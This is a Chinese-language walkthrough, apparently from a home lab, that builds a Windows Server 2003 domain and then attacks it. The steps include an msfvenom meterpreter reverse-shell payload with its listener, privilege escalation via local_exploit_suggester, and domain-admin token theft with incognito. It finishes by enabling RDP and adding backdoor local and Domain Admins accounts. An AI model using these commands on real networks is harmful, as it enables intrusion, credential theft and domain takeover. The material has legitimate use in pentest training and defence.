环境:kali、wdinwos xp、wdinwos xp、Windows Server 2003 R2
IP:172.16.12.100、172.16.12.101、172.16.12.102、172.16.12.103
一,域的搭建
(1)、下载地址:
ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
(2)、安装域控制器、DNS服务器:
(3)、设置DNS服务器反向查找区域(只输入主机名不带域后缀,加入后自动添加):
(4)、将被加入主机的dns设置为域服务器IP(域服务器DNS解析ip):
二,渗透攻击
(5)、制作反向连接木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.100 LPORT=443 -f exe -o payload.exe
(6)、将木马上传到172.16.12.101,172.16.12.100开启监听,在172.16.12.101点击木马:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 172.16.12.100
set lport 443
run
三,提权
(7)、将meterpreter放置后台,启动post/multi/recon/local_exploit_suggester模块(根据被攻击主机对应版本安装的补丁,来筛选出未安装补丁,显示可以利用且权限提升的模块):
四,窃取域令牌
⭐令牌被记录四种情况:(一)、在你开启meterpreter期间对方在被开启meterpreter机器登录。(一)、在你开启meterpreter期间对方在被开启meterpreter机器使用程序是用过其他用户账号密码。(三)、在被开启meterpreter机上已经被meterpreter连接过。(四)、在你开启meterpreter期间对方在被开启meterpreter机器远程登陆
use incognito
list_tokens -u
impersonated user TEST\Administrator
ps
migrate 1448
打开远程桌面:
run post/windows/manage/enable_rdp
rdesktop 172.16.12.121
五,增加管理员
(1),增加本地管理员
⭐在meterpreter中(需要窃取administrator令牌或者域控令牌,并迁移进程,被添加机器在线,且域控在线):
增加一个普通用户:add_user nihao xy@china110 -h IP地址
加入本地管理员组:add_localgroup_user "administrators" nihao -h IP地址
在shell中(在administrator的shell中或者域控shell中,被添加机器在线):
net user nihao 123.com /add
net localgroup "administrators" nihao /add
(2),增加域控管理员
⭐在meterpreter中(需要窃取域控令牌,并迁移进程,且域控在线):
增加一个普通用户:add_user bbbbb xy@china110 -h 域控IP地址
加入域控管理员组:add_group_user "Domain Admins" bbbbb -h 域控IP地址
在shell中(在administrator的shell中或者域控shell中):
net user bbbbb 123.com /ad /domain
net group "domain admins" bbbbb /ad /domain
⭐(一),在开启提升权限的meterpreter的时候,点击木马的攻击机账号退出不会使开启提升权限的meterpreter掉线,只会使连接的meterpreter掉线。(二),域管机器退出,也可以用域管帐号登录域机器,但不能用普通域账号登陆域机器